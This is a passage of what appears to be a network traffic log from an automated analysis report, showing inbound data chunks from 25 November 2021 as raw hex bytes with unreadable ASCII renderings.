ae 25 13 95 6c 4a 99 6d d3 78 ab b2 f2 c9 e1 25 d2 50 1a 26 97 76 45 b1 b6 ec d1 d0 44 ba 16 bd 68 05 cb ed a7 0d cd e0 3c c4 65 9f b2 d0 33 06 57 94 04 49 ab 55 52 c0 Data Ascii: =2N6[e_KF25t T!$-<2+;5<yq^fc0!ce':n1e^s{T8uTeU~pXkm/cQ,:erNZWD;y%lJmx%P&vEDh<e3WIUR
2021-11-25 15:51:21 UTC	152	IN	Data Raw: ff be 07 2d 5b 9f 3c 0c a6 17 c8 b6 68 5c c4 13 c3 f2 1b 78 f3 22 80 ad 60 a7 97 80 b5 89 d6 57 8f a3 26 e4 bc 0c a5 9c 05 35 2e 93 78 6d a4 a6 ac 45 da 20 22 b0 29 9b 85 04 26 f9 1e 9d e6 0c f9 68 bd 62 6f 3f 75 4b 8f 81 1a 02 26 6a c7 72 37 43 1a df c4 65 09 a8 7a 81 11 2c 42 e6 78 54 3d c4 a3 52 8d d8 93 95 71 dd df 5c 7f 22 65 96 e7 3c 0d b3 75 d5 a2 d5 39 c4 1c 4b 42 45 0e 27 13 da 2a b1 c0 0b c9 d1 38 39 b1 bb 93 96 9d 28 ed 04 75 df d2 82 92 93 ed b0 30 ea 74 3e 80 d3 d7 dc 97 82 74 95 70 4d 7e cb 81 04 5f c7 2a 27 e3 3e a0 37 f8 a2 22 6e 94 e1 cc 0d 8b 6b ce 46 78 65 33 85 1d 02 b2 51 e9 1e 97 04 b8 f6 2d 7f 50 fb d3 a6 1b c8 8c 9a 36 a6 5d fa ac d2 8b e9 11 3c 5c a6 20 48 2a ee 5f 9b 3b 56 1b 87 c3 2c 13 36 b6 f5 ce 61 0d 2b 99 62 05 09 cb 92 84 Data Ascii: -[<h\x"`W&5.xmE ")&hbo?uK&jr7Cez,BxT=Rq\"e<u9KBE'89(u0t>tpM~_'>7"nkFxe3Q-P6]<\ H*_;V,6a+b
2021-11-25 15:51:21 UTC	156	IN	Data Raw: 22 67 de b8 c6 67 65 0e 66 82 8c ed 6a 5f 10 51 d9 bd 89 11 55 85 03 ad bb ec 40 a5 45 b7 45 cf ab dc 05 2d a0 31 88 9d a8 d3 b4 62 03 d1 73 b9 63 ee 8c e7 3b 9c 3b 12 d9 de ca 15 3f 5e 06 53 80 49 cb e3 4a f3 7b 42 44 97 b3 4d 79 ef 18 2f b8 67 9c b5 86 30 95 91 4d 35 1a 9f 4a 6d a8 23 d6 46 3f 95 7e fa 96 f9 1b f0 61 e5 f8 2f 6a 85 40 2e 8d 78 1c 3b 22 52 fc 33 86 87 99 bb 97 8f a8 45 db 40 c7 40 ad 40 ec 52 51 a2 d2 1f 67 ff b7 8b 73 29 6a 1e fe e5 37 8f 94 f2 59 5d e7 fa af 73 a5 2c 42 a5 3a 08 92 ed c8 86 80 52 fc ea 70 aa 41 d2 3a df 80 ce a3 56 7b 4e 17 cf 36 8c ea 89 12 d8 44 21 74 41 cf 3c bf 89 1a 7c c0 78 c0 b7 dd ea 44 e1 36 25 e2 d4 22 f2 8d b1 c7 71 cf ca 10 b3 4a f2 d5 bf 88 fc 93 61 ec f5 6c 45 53 fb 64 05 05 bd e8 f0 2b 0e 50 f8 23 02 dc Data Ascii: "ggefj_QU@EE-1bsc;;?^SIJ{BDMy/g0M5Jm#F?~a/j@.x;"R3E@@@RQgs)j7Y]s,B:RpA:V{N6D!tA<\|xD6%"qJalESd+P#
2021-11-25 15:51:21 UTC	161	IN	Data Raw: cb 9a 41 25 13 d0 83 6a 57 95 80 73 1f ce 26 83 84 61 32 0d 26 f6 5d 7a a6 2c 1d 14 39 8b bf b6 59 59 cf dd 3f 5f 21 e6 42 d3 be 6f 79 73 d0 b2 ff 6f c8 bf 61 06 8f 12 a4 53 17 c0 e7 f6 93 d7 ff 76 60 ed 1c 69 ae 71 23 4b b5 86 96 37 86 4a ff 16 d6 fe ff 67 0e 60 75 25 e3 c3 11 ec f3 06 a9 47 c4 ae cf a0 66 8e fc 0d 17 79 de e6 b1 b8 d6 a1 d0 b6 f6 97 15 82 bb 99 bb 52 01 69 e3 39 42 db e4 49 74 33 17 8d 75 2c 2e 00 66 7e 95 9b 39 b2 f1 17 ad 5a 6a e4 18 bc e3 cd ac dc ee f5 75 fb 85 c1 1a 7f 43 c5 45 61 e7 c1 29 62 6d 04 b4 c0 e3 46 3b c0 37 3d a6 20 e3 83 9f 5b 1f c1 b7 44 79 58 16 a8 db dd df ee ef 65 47 01 f6 18 70 42 bc 30 fb fa 24 5c 9d 8f 0f 59 37 a9 bd 6a 87 18 a7 7a 97 1a 43 60 7c 5a e4 d6 f6 e9 16 7c 4a 33 9b 88 e9 7e d9 cb 49 c3 0b b9 a2 ad bf Data Ascii: A%jWs&a2&]z,9YY?_!BoysoaSv`iq#K7Jg`u%GfyRi9BIt3u,.f~9ZjuCEa)bmF;7= [DyXeGpB0$\Y7jzC`\|Z\|J3~I
2021-11-25 15:51:21 UTC	165	IN	Data Raw: 68 dd 57 e1 61 00 34 3a be 65 f4 e2 41 08 c9 42 da 97 69 ac 6d 63 a1 e8 2a a4 29 24 6b af c3 ed 04 b9 23 fb c7 11 e1 3c 3c a1 18 50 07 a7 8c d9 29 6b c5 27 1e 4b fa 29 0a 35 ea 02 f4 18 71 c6 92 aa 11 5e 3f ca 35 b3 fd 8a f0 e6 b5 88 e6 12 aa 91 96 3c d7 bf c1 12 9f 53 23 50 f4 a1 95 0c 2d 61 f3 71 77 70 e1 f2 5e 38 fc 8a ca d4 1f f3 11 25 73 cf 04 07 32 82 f2 32 b2 8f a0 08 5f 26 9a 1f 68 1b f4 5d b4 3a 8b e8 c3 20 f2 ed 01 fc 90 49 b2 8f a1 95 7c d3 9e fb 5a 06 a9 f6 65 b0 c2 1e 96 f5 54 7f 92 d0 f2 58 df 7b 41 11 38 df 7f cb f2 9b 78 bc d3 8c 59 fc 82 2c 85 a1 93 96 f9 9d 1a dd 3f 84 4d fb 86 c2 a7 21 65 e6 b2 1b b4 fd d1 09 27 1b 9d 33 7d 37 7d 55 09 15 c2 a2 2f 12 da b1 80 5a 6c 37 dd df 6a 0c 65 97 88 5b 82 9f e5 2c 5d dd 54 0d 84 43 bd 61 ad 6b ee Data Ascii: hWa4:eABimc*)$k#<<P)k'K)5q^?5<S#P-aqwp^8%s22_&h]: I\|ZeTX{A8xY,?M!e'3}7}U/Zl7je[,]TCak
2021-11-25 15:51:21 UTC	168	IN	Data Raw: 00 85 57 55 e8 93 69 30 4d 26 43 55 61 ba fe 89 1c 89 63 5a cc e8 7c 7a fa 26 f7 7f 24 f2 31 a9 4d 4a f2 85 e9 21 59 5d 89 02 54 7b 9c 4c da 97 8e a4 14 de a5 57 b5 3f 42 cc 81 c9 bb 63 8a 95 68 7e 19 65 6e af 43 f1 d9 b6 11 37 62 c8 2a 7b c0 e2 e2 7e c4 66 7e 80 15 6c df d3 05 87 cd 8e f1 00 42 97 06 a5 a9 59 c2 05 a0 d0 50 29 c8 0a b1 71 27 5a 62 0b d2 4b 9c 7e b6 e8 46 dd 37 dc 99 3f 26 eb 0b c4 4e a1 60 fc 0d 2e bf f4 8d 07 ce 43 1f 2b 81 c9 0e f6 85 08 4b d8 3b e5 73 47 5f 14 e9 72 2f 78 a6 ae 8f 1f e7 c3 21 59 b5 ed 18 af ee 3c 2e 11 e0 57 d2 69 b5 8e ec c4 d5 23 fb 8c 55 dd 1c fc f6 ff 2e 51 78 3c 2c 1b 55 bb fb 65 e5 65 40 6d 52 fb 8d 17 d4 67 af 95 11 21 08 11 9a 41 45 5a e4 f6 d6 2d 7a a6 8a 28 0c ce bb 50 45 96 9a f2 98 f6 2d ac dd 8d f1 f8 17 Data Ascii: WUi0M&CUacZ\|z&$1MJ!Y]T{LW?Bch~enC7b*{~f~lBYP)q'ZbK~F7?&N`.C+K;sG_r/x!Y<.Wi#U.Qx<,Uee@mRg!AEZ-z(PE-
2021-11-25 15:51:21 UTC	172	IN	Data Raw: fa 27 e6 dc cc c6 79 e2 77 a7 45 d5 b0 26 9d 3b 4e 15 5d e2 2f 0b bf 80 de d6 36 c0 13 dc d7 d2 4d 7b 48 30 9e a6 b5 7e 12 ce 3c 46 b9 1e eb 14 01 e1 3e 27 01 e1 cf b5 c0 3e 98 06 2b 74 8f 11 d6 93 ae 53 e0 0f 3f 98 38 39 49 c3 93 78 a7 31 79 29 06 45 49 dc cc 64 16 34 8b 17 31 85 7d 23 dc d2 3f a9 49 c2 13 c4 1c 18 2a 70 3b b5 ef 10 08 4a 23 ef 06 54 cf aa 6d ff 3e 29 1c 80 3f 24 66 81 f3 71 b6 a6 26 6e 98 03 c9 87 6d d1 cd 8f 74 56 79 31 94 91 0e bf f0 fd 0c 5b f9 94 82 8c 8b dc c8 64 0f 4f ef e3 99 09 b0 d9 37 d4 24 84 24 8f 74 a8 20 9f 82 e3 7b 13 62 8a fc e1 be 51 4d 48 cd 9c ad 07 22 63 33 be 17 41 dd 22 9c bf 8d 08 30 f8 05 a7 26 9d 3d 9b 36 dd 2e 02 33 71 29 0e d8 a2 4f f9 1c 6b 5d 56 e9 04 b2 7f 46 36 69 db 3c 1d 0a 4a c5 88 da 67 ab 58 74 4b 68 Data Ascii: 'ywE&;N]/6M{H0~<F>'>+tS?89Ix1y)EId41}#?I*p;J#Tm>)?$fq&nmtVy1[dO7$$t {bQMH"c3A"0&=6.3q)Ok]VF6i<JgXtKh
2021-11-25 15:51:21 UTC	176	IN	Data Raw: b1 7c 7b 24 00 bd 89 8d 4d 4b ae 01 c2 6c 24 c0 bf e3 1a 26 f4 e0 07 a5 be 17 29 45 c9 86 89 a4 b8 e4 47 c5 83 ac db 18 09 aa 27 a4 d4 4c cb f7 69 35 2a 9a 4f 8a 51 7a 53 97 98 34 ef f9 39 b7 9f a7 67 99 eb 3b bb f0 78 c0 08 f7 6b 6f 94 02 b7 42 6a 86 4a cb 0a 54 1d 81 c1 25 d3 80 74 37 ae 24 43 63 07 33 89 ae c0 da 97 80 bb 92 15 62 82 e5 23 90 76 24 68 b0 5b 54 59 55 63 00 7e b5 57 e0 18 03 03 38 0e a7 4e f8 a7 a6 aa 30 87 df 41 18 c8 81 f0 65 e2 a6 12 da e0 d3 08 97 be 00 60 e1 4c 3d 8d 91 96 35 b2 7e 7a c7 56 83 c3 19 ca 77 2c 19 39 44 a1 a7 97 8e 82 f4 51 54 c2 9e 3c ce ad 90 e8 37 24 7e 58 74 5c ce 52 a7 a5 15 b1 d1 09 28 20 98 cb dc ab a4 21 11 2a 66 7c b7 79 25 0b 19 de bf 67 0e 57 6f 17 20 8c 60 78 9d 8e e1 34 3b 41 c1 1e 8b 0c ac 0b 42 3d eb 55 Data Ascii: \|{$MKl$&)EG'Li5OQzS49g;xkoBjJT%t7$Cc3b#v$h[TYUc~W8N0Ae`L=5~zVw,9DQT<7$~Xt\R( !f\|y%gWo `x4;AB=U
2021-11-25 15:51:21 UTC	180	IN	Data Raw: 20 72 9e 01 e2 d3 01 85 7d 2a 1e ea eb b4 4d 3e 25 d3 da c1 22 94 18 f7 9a fe d6 1c 4a 7a 12 cb 84 e1 40 33 08 37 dd d8 9f b6 f6 86 f1 8d 30 13 40 a5 cc 92 93 72 e7 52 1d 59 50 1a 4d ee b0 29 0f e1 36 7d 7f 03 df 36 36 f8 0e b8 1c 47 f6 df e3 6e ae 20 b0 6b d8 69 d9 22 d3 0a af 59 8b 8d 4d d2 08 60 9f 16 70 60 24 8f 59 8c 6b 82 7c 40 42 2f 6e 93 42 be 40 20 b2 d8 27 7f d5 ac 0c b3 a3 ca 80 c8 61 4f 1d cc 83 c1 28 b1 46 56 62 44 bd f3 6f 30 e7 47 6d d4 4d 41 cf bb f2 34 45 64 89 dd 2a 09 22 8e 02 15 c4 67 e2 5d 11 1f fb 38 78 de ca 08 38 29 02 2f e0 64 8f 92 1c fa 88 4e 20 17 9d c0 69 ca cb 96 ed 47 51 4b dc f5 30 f1 68 b7 9b f4 b0 54 1a b0 f3 16 26 cf ac 59 a6 11 27 32 05 81 76 a3 4f bd f6 12 f9 a7 69 79 72 93 19 0f c9 88 97 cd 97 ee a3 c1 94 f0 89 e1 d1 Data Ascii: r}M>%"Jz@370@rRYPM)6}66Gn ki"YM`p`$Yk\|@B/nB@ 'aO(FVbDo0GmMA4Ed"g]8x8)/dN iGQK0hT&Y'2vOiyr
2021-11-25 15:51:21 UTC	184	IN	Data Raw: 7e ce dd 55 e8 9b 41 a9 58 bf 15 27 f5 ae 34 1d c4 0c 66 3a 4d 97 d2 2c 9a d3 88 07 7f 30 c0 72 86 65 03 73 49 9e 26 98 90 5a db b7 f5 8e e8 77 d0 95 17 09 96 6b 3d a8 19 00 54 f0 9f c1 7d 4a c2 be 0b c3 f6 f1 e7 89 fd 00 d3 2f 81 dc e7 7d 18 19 f9 15 b5 eb 7a 40 eb 9e 51 fa c3 5a 09 e5 65 f2 2a 64 3b cf 1b fa 8f 43 e3 9a 34 df 0e 33 47 59 b8 0f e3 c9 1a a9 9c e3 cb a4 b8 92 5a 00 57 bd 2d a6 e3 f3 17 4f 44 e5 ff 7f f5 22 62 ca ba 1b 79 ba af 3d 88 9b 0a ad e1 e0 fc ed 12 56 dc 5f da 70 bd 28 f0 f7 71 a7 a6 f6 5a 47 c1 da db e3 c4 36 0f 2d 58 dc 6d 36 98 df 7b b1 95 80 0f 0b 2d 9f 51 e8 fc 1f ed 21 2a 9c 37 9c 9b 53 a7 61 04 6b f9 c9 04 53 47 5b 25 eb 6e 62 2b 5d c5 21 fc c8 a1 4a 37 bf 40 f1 3c 6e 3e 67 2a ee 0e 18 24 aa 11 70 7f 6f 44 13 10 1e e6 c3 0f Data Ascii: ~UAX'4f:M,0resI&Zwk=T}J/}z@QZed;C43GYZW-OD"by=V_p(qZG6-Xm6{-Q!7SakSG[%nb+]!J7@<n>g*$poD
2021-11-25 15:51:21 UTC	188	IN	Data Raw: 85 bb e3 a8 c7 d2 d5 45 1e 96 f3 04 08 f5 9f 72 02 40 9c 78 a1 91 07 2b 91 57 eb 84 5d a9 40 9b a8 76 63 b2 82 05 1f 12 a7 a2 16 a1 78 0d bb e0 28 93 48 19 42 bf 3c b2 06 a9 85 e0 0b e2 98 7c 19 5e 5e ff 4c d3 c4 5d 0d 21 f3 db 81 e0 9d ac 81 93 a3 f3 c0 ac 48 bf 1e 8c 06 aa 30 17 b7 f7 e3 89 8d 58 11 8b 2d 56 eb eb ab 39 f2 cb 9b 68 9e 88 62 7d 70 ab 60 92 7f 04 1e 04 bb 48 87 2d 05 52 80 1b 1b ff 5b 45 cf 8f 64 0b e4 7a 6d d4 b9 97 b4 e5 1b eb ac bf 5a 98 50 67 d5 1f e0 9d db 6c 7e ca 97 0a 76 c4 7b 9e ce eb 07 7b fd 99 18 9f a4 dd ce 23 37 3c b9 a6 e9 7f 0a 31 65 5b f8 59 b9 4b d1 e7 dd 3e 41 5b df 5b 89 33 5a 73 34 c0 09 6f de 08 66 48 1f 63 96 14 7b 46 26 56 8d ed a4 05 d8 9c c8 d0 50 bf b7 a3 36 12 0d c8 86 42 e4 95 11 9b 49 9f c0 91 48 24 f2 ef b3 Data Ascii: Er@x+W]@vcx(HB<\|^^L]!H0X-V9hb}p`H-R[EdzmZPgl~v{{#7<1e[YK>A[[3Zs4ofHc{F&VP6BIH$
2021-11-25 15:51:21 UTC	193	IN	Data Raw: f6 7b 38 92 4b 01 33 3c 86 b8 99 fb 53 46 3b b5 87 35 66 a0 1f 8a 13 3e 26 13 b8 33 9b fc 28 24 06 f4 29 7c c3 a7 b1 23 58 ca 8c 6b 19 aa d7 b7 c9 47 9c 9b 6d 2c 8c c8 6b 87 f1 7d da 2e 93 43 e0 79 11 1e 2e f8 20 c5 8f 97 5e 76 13 29 7a 92 0e d8 77 fd 3a ca 58 c4 20 fe 99 15 cc d8 d1 a7 8b 3c c7 ac 84 04 32 cf e9 8d b8 ae c2 0e 42 28 af c5 69 f5 3b b7 3c c1 7b c3 b3 48 27 05 6c f1 43 7f 7c dc 1a f1 19 3d 44 49 ef a2 d5 a1 a5 d8 c7 91 9b c6 9c ab 44 f1 b5 66 1c 88 90 97 e3 14 42 87 47 43 5c 45 1d 67 26 da ea 1d b9 b5 79 08 69 d3 a9 58 32 11 7a da e9 98 55 e8 ee 03 2b c1 6c 03 df b1 47 1b b0 db 5b 32 30 68 e5 69 03 44 a9 8a 1b 79 34 c1 df 00 71 f4 e0 56 02 2e dd e9 29 04 ad 88 b8 65 ac 4d cb 79 b5 ff e3 e8 45 74 6a 88 83 c8 ba f4 c1 44 d0 bb 61 46 83 2c 42 Data Ascii: {8K3<SF;5f>&3($)\|#XkGm,k}.Cy. ^v)zw:X <2B(i;<{H'lC\|=DIDfBGC\Eg&yiX2zU+lG[20hiDy4qV.)eMyEtjDaF,B
2021-11-25 15:51:21 UTC	197	IN	Data Raw: 80 11 34 12 6a 5f c3 cf 0b 62 07 da 69 51 36 4d df 30 6b e7 68 ec f8 9c dc e4 e2 1f ab d3 27 7c 6a 60 dd 3f 73 14 43 d0 f2 96 37 16 d3 00 6a 38 e0 88 d7 ea 3c 61 0b c6 79 74 21 99 35 ee c5 63 65 7b a4 5e fe 4e 52 b0 f7 cb a7 c5 a0 d2 b7 06 f3 03 f7 52 07 f3 ed 3d b0 85 3d b0 7c f6 e7 f3 dd 93 89 77 92 64 d6 89 42 bb b4 6c 03 b7 b0 ad c2 79 ba bd be 5b d7 b4 40 78 61 a0 19 d7 04 9c 2a d5 1f d2 8c 84 54 3e 81 be c5 c2 68 ce 91 a2 b2 dd bf 3f ee 29 8a e8 8d 34 25 c6 5e 00 1e 22 6f 1d 6d 20 d9 f4 d9 76 7c 82 ed c2 be a3 06 46 b3 d0 dc d7 eb 5f 28 8b 73 aa ca 47 04 c9 fe 47 4b a3 b4 a6 72 3a e0 3b 8b 0c c2 33 b8 b6 71 8a 29 0c 10 ec b6 5e dd 20 f2 27 e6 ac ab 3a ea 8d e3 24 e3 8a 2a 5f 1c c9 e1 1a 16 68 49 eb 86 8e 98 dd b5 67 90 12 76 4c a6 d6 75 b2 a7 a7 4f Data Ascii: 4j_biQ6M0kh'\|j`?sC7j8<ayt!5ce{^NRR==\|wdBly[@xaT>h?)4%^"om v\|F_(sGGKr:;3q)^ ':$_hIgvLuO
2021-11-25 15:51:21 UTC	200	IN	Data Raw: 9e 41 c8 03 ad 35 46 12 f3 3a 88 a4 88 e7 f4 9d 9f b8 1a f8 78 1c ba fb 50 97 e6 19 11 72 c2 8e e8 78 de c4 2e 21 01 be 43 dc 3e 1b a4 13 44 0d 33 ee e2 8f 64 0a 66 56 2b f6 2d 7e ee 87 a9 08 c7 d4 8c 0f 11 e2 36 33 f0 d4 68 cb 94 da 5f 88 be 83 b4 28 36 51 94 bb 14 37 63 dd 06 a7 80 3b 6e fd 82 3f 79 73 f5 04 8d f0 f0 a3 fb 91 7b e8 bb 9d a7 73 57 cc 50 03 1b 80 16 22 b2 19 48 9d 9f 5b cd 82 b1 b0 01 a2 47 7e 93 e7 a2 94 20 43 39 22 56 b8 4e ea e2 21 f0 2e c0 7b e7 4e fc bc 41 f5 c9 02 c3 66 82 fa 17 0a ba 81 44 47 0b cd de c6 cd 13 a0 10 98 56 69 e8 59 8f ba 0b 72 47 ca 43 bd e6 50 fd e8 5f 4c 14 54 14 08 74 78 db 89 3d d7 75 9d 88 77 17 50 34 d8 a1 7e c2 d5 9c ec e5 72 b9 18 1b 3e 56 ec ea ff 3b b1 05 36 18 d1 0f 29 9a de 00 0f 46 42 17 7d ef a0 35 68 Data Ascii: A5F:xPrx.!C>D3dfV+-~63h_(6Q7c;n?ys{sWP"H[G~ C9"VN!.{NAfDGViYrGCP_LTtx=uwP4~r>V;6)FB}5h
2021-11-25 15:51:21 UTC	204	IN	Data Raw: 27 66 a8 66 ab 5d e5 78 a2 4e a7 6a 92 b1 a3 15 ae 98 33 11 35 5a 0e be 09 ce 1c 19 01 e2 a5 36 3a 67 70 9a 9a 76 67 f5 57 5c c0 4b 4d 1f 77 df 2f dc 20 e5 a6 44 bc 9a d0 54 90 0d 12 b6 d0 ac 83 8c 5b d7 62 b6 73 2d e0 d0 4b a1 ea a7 86 f7 14 41 9d 1b e2 35 0a 3b cc ee d7 1a 61 13 a0 22 bf 06 0c 31 99 b0 5f 80 30 67 57 31 ba 7e 33 7c 87 2c 6d fc 91 37 ae e5 8d d1 a6 e5 27 9f 3f 85 4d 5c 9a 36 2e f6 7d 0f 63 c8 6f 9f a4 3a 48 1f fe 71 52 3d 4f 73 66 8b 48 4a c5 20 e9 e2 3f f5 86 d5 de 01 82 b0 8c 65 44 4f 0c 76 fc 84 10 e0 0f 15 9e 77 c6 a2 49 a8 d5 b3 8a a2 8e 2a 44 d5 bd e4 b5 d5 4e 15 02 8c ba 7e 41 44 82 70 1c 04 8e 55 5f f3 01 ce 62 7b 7b 08 7b 78 94 a0 ee d8 38 d6 a2 03 9a 14 bb eb b4 86 37 12 a9 18 dc 70 c5 43 cf e5 7e 1c 56 b0 7d b4 7e 2d d3 8c 1a Data Ascii: 'ff]xNj35Z6:gpvgW\KMw/ DT[bs-KA5;a"1_0gW1~3\|,m7'?M\6.}co:HqR=OsfHJ ?eDOvwI*DN~ADpU_b{{{x87pC~V}~-
2021-11-25 15:51:21 UTC	208	IN	Data Raw: 96 bc e0 98 cd 9c d2 99 9b e6 87 eb 39 b7 02 72 93 02 7c b4 1c a6 3d ef 45 b7 38 e7 f8 76 2a a3 30 d4 56 ee 8f e2 8c 84 00 cc 3f 7a 2c 96 a6 a0 c1 34 51 20 15 9c bf 4f 7d 71 91 df fd 01 22 bb 76 12 d1 b6 ad dd fb 95 25 c9 fd 0f fe 39 4b e6 41 f3 f5 31 e6 60 73 f2 ac 8b 91 00 cc 61 8c 8a b2 ae b5 4b 8a 72 6b 86 d9 17 9f a2 62 84 15 b2 79 1f f7 0a 8f 55 67 08 1d c7 39 5d 78 d1 2f 02 c7 e7 70 8d 66 10 fb 1f 9d 55 b6 55 3f 6f c7 b8 1d 95 a4 b1 8e 31 6f ea 9c e2 25 48 04 12 4f 2b 8d 9a 7a ec c9 bd 95 bd b3 eb 5d 52 40 33 c1 bb a8 94 90 b7 67 55 e0 06 3a e3 f5 bb 23 cb c4 0e 56 3b 33 23 1c 93 dc 27 b0 69 66 26 4d 07 a4 f4 7b 2d 12 06 ab fe 6d eb a5 df de 70 24 f2 93 d0 64 cc 41 5e ca fb 9d e2 46 54 9c 89 39 e5 75 4b b9 7b 29 b9 91 0c 35 44 fd 7c 81 86 a4 50 a3 Data Ascii: 9r\|=E8v*0V?z,4Q O}q"v%9KA1`saKrkbyUg9]x/pfUU?o1o%HO+z]R@3gU:#V;3#'if&M{-mp$dA^FT9uK{)5D\|P
2021-11-25 15:51:21 UTC	212	IN	Data Raw: 4d 73 54 74 d7 87 0b 1a 89 a3 8a 47 e1 4e fa b3 9e 90 47 ce 9d 50 25 a2 56 9b c2 d2 01 95 9d 86 28 e6 63 1a e7 f9 16 13 cb cd 4d 89 19 f4 5b 29 48 bb 20 53 3c c6 85 fd f5 5f 8c 75 fd 71 67 fc f0 fd 55 00 c2 ba 01 ec 24 c1 59 4c 6d db 73 d3 0a ec 91 8e b0 b3 ea a8 17 be 3e 65 98 4a a4 30 69 f4 2c 23 28 21 16 0d 84 61 da 07 c7 a2 2e cb 0e aa 5c e4 0c 5f 7a 90 cd 3e 1b b2 8e 20 05 a7 03 b1 5a ed b3 01 d2 af 79 92 86 c4 68 7a 34 68 3a 39 1d 84 d9 76 b4 2d 78 7b 8b 0c 81 1a 3f c1 f0 e5 7f cd 2f 56 a6 be 45 bb 28 e4 a4 23 51 80 aa 46 42 fa 39 7b d2 ea e8 8e f8 b3 49 5a 0b 91 60 89 d8 3b 04 47 0d 5c b7 04 28 e8 db 6f 21 b7 02 a9 8c e1 24 58 dd 24 33 1b 84 15 25 7f 14 a5 02 69 de d6 c6 56 ad a7 2c 39 f7 04 20 de e4 e0 bc 83 a1 01 6c 91 89 c8 05 f6 18 89 e8 dc a4 Data Ascii: MsTtGNGP%V(cM[)H S<_uqgU$YLms>eJ0i,#(!a.\_z> Zyhz4h:9v-x{?/VE(#QFB9{IZ`;G\(o!$X$3%iV,9 l
2021-11-25 15:51:21 UTC	216	IN	Data Raw: db 47 75 9a 8a 1e 7a 45 32 80 7a e9 33 ca 43 6e 2c 74 13 8b 10 bc bf e9 06 7b 35 cc 52 93 b6 5a c6 c2 51 37 6f 6a ce b0 22 91 3a 32 5e 16 31 d8 82 da 74 35 54 56 52 aa c3 6b e3 91 9a 03 7a 8c f8 0a c0 10 e1 75 6b e6 30 55 ee 59 9e 62 57 45 37 e8 5b 0e 5d 4e b3 ad 2a 38 a2 e3 b4 47 e8 5a db 9f 89 b3 21 ca d3 81 f8 6f 16 11 22 3f 0d 3a 4f 65 e8 c0 2d 90 1e db 92 f1 bf e2 99 ec db f2 a2 f6 63 ef d6 41 93 00 a1 61 d1 8f 2a 03 c5 8b 2a 0c 10 9a 3b 81 5a bb b1 99 b2 68 96 2b 20 6f f1 0a ce 14 a4 e4 cf 99 7f b4 7b 7d 88 15 32 3d d4 b1 ea 02 ac cc 20 d7 4f 3b 2a ae 8d bb 76 3f 3b 8e 58 b3 c6 52 53 9c 0c 91 ab ef 29 89 a2 0d 58 25 46 28 ff 1a 38 43 b3 bd db e3 f6 c4 fd 4f 95 24 7f 63 a6 ba b5 38 2e 8a 94 f2 0e 7a 81 1e 36 30 fe e9 9e f9 9b 4e 6a dc b8 f1 f3 eb fd Data Ascii: GuzE2z3Cn,t{5RZQ7oj":2^1t5TVRkzuk0UYbWE7[]N8GZ!o"?:Oe-cAa;Zh+ o{}2= O;v?;XRS)X%F(8CO$c8.z60Nj
2021-11-25 15:51:21 UTC	220	IN	Data Raw: f2 de cb 6a 8f 7c 0e 19 d4 76 cf 33 ae 0e 0d 02 51 44 3d 37 c9 a3 be f6 7a f1 24 23 63 d8 67 e9 1d 3d 9d cf 1a 05 4b 26 0c 89 f4 97 48 83 00 1e 91 7d ed b2 40 72 a2 fc 0e 59 cc 71 e5 02 81 cc c4 f6 13 c4 b4 d3 5b 9c 13 02 87 15 d7 f7 ac c1 e5 e1 82 e8 31 82 fa 26 14 e5 44 51 9a c3 13 6f 3b dc 80 08 44 d9 a8 e6 1f 5e b5 df 60 ee bd 87 c6 d6 d4 bd 06 5f 44 f7 f9 16 29 05 43 5c c5 f7 28 7f 7d 8e cf 58 ca 70 c1 bd f7 51 4f b1 f4 88 17 12 72 05 ac 08 80 4f b9 e0 6b 99 3b c7 a9 7f d9 9b 3d 49 40 d3 89 6c 0b 71 4e f1 b4 c8 aa 66 1c d4 5a e3 06 34 fb 55 c3 54 a8 95 93 19 f5 70 f7 30 d3 76 6d 9f b3 d9 38 40 01 29 fc 45 ad 0e 15 03 32 f8 6c 10 81 2b d7 7d 58 c3 55 a7 77 de 0f 62 8c 02 b7 63 59 57 b8 a8 07 b3 b7 08 d7 fe 07 67 37 d6 d5 af 84 71 1b 3d 0a 58 de ab da Data Ascii: j\|v3QD=7z$#cg=K&H}@rYq[1&DQo;D^`_D)C\(}XpQOrOk;=I@lqNfZ4UTp0vm8@)E2l+}XUwbcYWg7q=X
2021-11-25 15:51:21 UTC	225	IN	Data Raw: fa 26 33 25 f4 55 09 97 d3 b9 fb 64 ac 56 30 ec 93 ec 06 ab d2 79 d9 e3 57 9c d8 64 14 f9 5e 80 f1 53 8e 3a 30 4d e7 24 9e f5 6a 70 68 2c 5b 39 44 64 3f 66 bd 4b 33 34 20 e8 8a 40 61 62 93 95 3f ec f5 b9 6c 76 8b 91 d6 6c de a7 44 50 54 3d b7 7a 1d 5e e0 17 49 0b fe d4 12 43 13 98 f7 e0 f9 f6 78 fd 8b ab 0c e6 24 bb 40 ac 11 32 52 db 04 cd ca 8c b9 99 d1 c5 d9 69 ae 02 02 f9 af d8 da 3a c6 83 c7 fb 7c a3 1a a6 0a da a7 46 9b 61 b2 c3 d3 9c e7 fc 7b f1 0d c9 b2 77 b0 65 37 15 e8 3f 99 9f d2 7c 1d ef b6 eb b9 54 7f d4 31 3a c8 71 31 79 3d 02 5c a1 36 74 07 e2 ab cf 89 07 be 60 aa a4 17 f8 27 46 4d 2e 07 b2 5c 4d 75 5b 85 0b c6 37 65 b4 1a e6 fa e1 90 16 f1 a2 f2 79 b2 a7 bd e6 e0 a3 3d 06 94 99 ea 24 4b 49 33 d6 27 c2 9b a6 b1 f9 48 3f b0 16 b1 4f d6 17 e8 Data Ascii: &3%UdV0yWd^S:0M$jph,[9Dd?fK34 @ab?lvlDPT=z^ICx$@2Ri:\|Fa{we7?\|T1:q1y=\6t`'FM.\Mu[7ey=$KI3'H?O
2021-11-25 15:51:21 UTC	229	IN	Data Raw: 02 ef c4 3a 51 61 ad 56 b8 59 1d 82 16 9b e8 bc 36 0b f3 93 80 10 dd 43 97 fb 40 cc 5d 12 10 4a 6c 15 47 cd 67 87 66 1c a2 ad 36 91 41 c1 cd c6 41 11 c6 cb 31 3c fc 52 36 0b 27 52 b6 de 7b a7 50 ec ca 2c f6 ce 0c 6e 7b e5 4f 50 22 9c 13 e0 7b ec 5e a8 fe 13 63 c6 3e a0 02 d9 13 49 b7 3c a7 9e d8 49 c9 23 98 36 de 93 77 9d 3a fc 8c d3 e2 e5 11 4a b4 4d 49 94 10 ef 38 88 18 da 7f 80 1d 7e 24 8a 5c 6d cb 77 49 be b3 ef a8 11 26 26 e7 cc 3d bc e1 66 d6 70 f5 5c e7 32 26 a2 16 8e 01 ee 4e a3 3e 3d c2 58 f6 f9 d5 0d 3a 93 52 42 62 ec ee 91 c5 b5 c9 fe d0 c5 51 dc 2d 54 29 db a0 b8 